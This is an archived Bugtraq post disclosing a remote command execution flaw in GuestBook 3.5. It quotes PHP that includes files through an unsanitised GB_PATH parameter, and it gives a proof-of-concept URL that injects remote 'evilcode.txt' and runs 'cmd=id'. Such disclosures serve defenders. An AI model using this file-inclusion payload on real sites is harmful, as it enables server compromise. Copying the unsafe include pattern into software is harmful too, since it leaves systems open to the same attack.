Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

[Kurdish Security # 17 ] GuestBook 3.5 Remote Command Execution
From: botan () linuxmail org
Date: 1 Aug 2006 14:02:40 -0000
Kurdish Security 



Guestbook v3.5 Remote Command Execution 



Freedom For Ocalan



Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com



Rish : High



Class : Remote 



Script : MoSpray



Site : http://www.knusperleicht.at


Code : 


define('FILE_POSTS',GB_PATH."db/posts.dat"); 
define('FILE_SMILIE',GB_PATH."db/smilie.dat"); 


$GB_INCLUDE[Img] = GB_PATH; 
$gb_failure = true; 
$gb_del = true; 
include(GB_PATH."admin/engine.inc.php"); 
include(GB_PATH."db/settings.dat"); 

http://www.site.com/[scriptpath]/index.php?GB_PATH=evilcode.txt?&cmd=id

Eof.

  By Date           By Thread  

Current thread:
  • [Kurdish Security # 17 ] GuestBook 3.5 Remote Command Execution botan (Aug 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]